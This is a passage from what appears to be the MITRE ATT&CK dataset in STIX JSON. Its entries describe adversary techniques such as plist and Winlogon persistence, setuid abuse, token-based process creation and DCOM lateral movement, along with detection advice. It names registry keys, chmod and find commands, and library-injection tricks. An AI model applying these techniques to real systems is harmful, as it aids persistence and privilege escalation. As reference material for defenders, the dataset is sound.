Snapshot", "description": "Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx"}, {"source_name": "StackExchange Hooks Jul 2012", "description": "Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.", "url": "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Active Scanning", "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", "created": "2020-10-02T16:53:16.526Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1595", "external_id": "T1595"}, {"source_name": "Botnet Scan", "description": "Dainotti, A. et al. (2012). Analysis of a \u201c/0\u201d Stealth Scan from a Botnet. Retrieved October 20, 2020.", "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf"}, {"source_name": "OWASP Fingerprinting", "description": "OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.", "url": "https://wiki.owasp.org/index.php/OAT-004_Fingerprinting"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Plist Modification", "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "created": "2020-01-24T20:02:59.149Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/011", "external_id": "T1547.011"}, {"source_name": "fileinfo plist file description", "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.", "url": "https://fileinfo.com/extension/plist"}, {"source_name": "wardle artofmalware volume1", "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", "url": "https://taomm.org/vol1/pdfs.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-15T20:52:09.908Z", "name": "Abuse Elevation Control Mechanism", "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "IaaS", "Google Workspace", "Azure AD"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "created": "2020-01-30T13:58:14.373Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548", "external_id": "T1548"}, {"source_name": "TechNet How UAC Works", "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "Fortinet Fareit", "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"}, {"source_name": "sudo man page 2018", "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", "url": "https://www.sudo.ws/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Create Process with Token", "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Vadim Khrykov", "Jonny Johnson"], "x_mitre_deprecated": false, "x_mitre_detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control", "System access controls", "File system access controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", "created": "2020-02-18T16:48:56.582Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134/002", "external_id": "T1134.002"}, {"source_name": "Microsoft Command-line Logging", "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"}, {"source_name": "Microsoft RunAs", "description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.", "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Setuid and Setgid", "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user\u2019s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user\u2019s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "created": "2020-01-30T14:11:41.212Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/001", "external_id": "T1548.001"}, {"source_name": "GTFOBins Suid", "description": "Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.", "url": "https://gtfobins.github.io/#+suid"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "setuid man page", "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", "url": "http://man7.org/linux/man-pages/man2/setuid.2.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-14T21:24:37.780Z", "name": "Winlogon Helper DLL", "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["SYSTEM", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", "created": "2020-01-24T16:59:59.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/004", "external_id": "T1547.004"}, {"source_name": "Cylance Reg Persistence Sept 2013", "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "System Firmware", "description": "The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Becwar", "McAfee"], "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", "created": "2017-05-31T21:30:28.613Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1019", "external_id": "T1019"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/532.html", "external_id": "CAPEC-532"}, {"source_name": "Wikipedia BIOS", "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", "url": "https://en.wikipedia.org/wiki/BIOS"}, {"source_name": "Wikipedia UEFI", "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface"}, {"source_name": "About UEFI", "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", "url": "http://www.uefi.org/about"}, {"source_name": "MITRE Trustworthy Firmware Measurement", "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research"}, {"source_name": "MITRE Copernicus", "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"}, {"source_name": "McAfee CHIPSEC Blog", "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"}, {"source_name": "Github CHIPSEC", "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", "url": "https://github.com/chipsec/chipsec"}, {"source_name": "Intel HackingTeam UEFI Rootkit", "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-08-11T20:21:55.610Z", "name": "Distributed Component Object Model", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "created": "2020-02-11T18:26:36.444Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/003", "external_id": "T1021.003"}, {"source_name": "Fireeye Hunting COM June 2019", "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"}, {"source_name": "Microsoft COM", "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx"}, {"source_name": "Microsoft COM ACL", "description": "Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.", "url": "https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1"}, {"source_name": "Microsoft Process Wide Com Keys", "description": "Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx"}, {"source_name": "MSDN WMI", "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx"}, {"source_name": "Enigma DCOM Lateral Movement Jan 2017", "description": "Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/"}, {"source_name": "Enigma MMC20 COM Jan 2017", "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/"}, {"source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/"}, {"source_name": "Enigma Excel DCOM Sept 2017", "description": "Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.", "url": "https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/"}, {"source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017", "description": "Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.", "url": "https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Change Default File Association", "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example:\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Travis Smith, Tripwire"], "x_mitre_detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. \n\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's 